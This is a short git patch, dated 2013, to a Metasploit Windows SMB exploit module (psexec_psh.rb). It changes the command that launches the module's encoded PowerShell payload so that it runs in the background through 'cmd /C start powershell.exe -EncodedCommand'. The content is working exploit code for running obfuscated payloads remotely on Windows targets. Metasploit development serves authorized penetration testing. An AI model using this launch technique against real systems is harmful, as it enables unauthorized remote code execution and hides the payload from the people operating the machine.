From e6ebf772de031b6f4b55065b04f5cb1ba6f8e7c3 Mon Sep 17 00:00:00 2001 From: RageLtMan Date: Mon, 21 Jan 2013 08:12:56 -0500 Subject: [PATCH] allow psh to run in background via cmd start --- modules/exploits/windows/smb/psexec_psh.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/windows/smb/psexec_psh.rb b/modules/exploits/windows/smb/psexec_psh.rb index 99dc381775..666181292e 100644 --- a/modules/exploits/windows/smb/psexec_psh.rb +++ b/modules/exploits/windows/smb/psexec_psh.rb @@ -270,6 +270,6 @@ class Metasploit3 < Msf::Exploit::Remote psh_payload = compress_script(psh_payload) # Determine appropriate architecture ps_bin = datastore['RUN_WOW64'] ? '%windir%\syswow64\WindowsPowerShell\v1.0\powershell.exe' : 'powershell.exe' - command = "%COMSPEC% /C #{ps_bin} -EncodedCommand #{psh_payload}" + command = "%COMSPEC% /C start #{ps_bin} -EncodedCommand #{psh_payload}" end end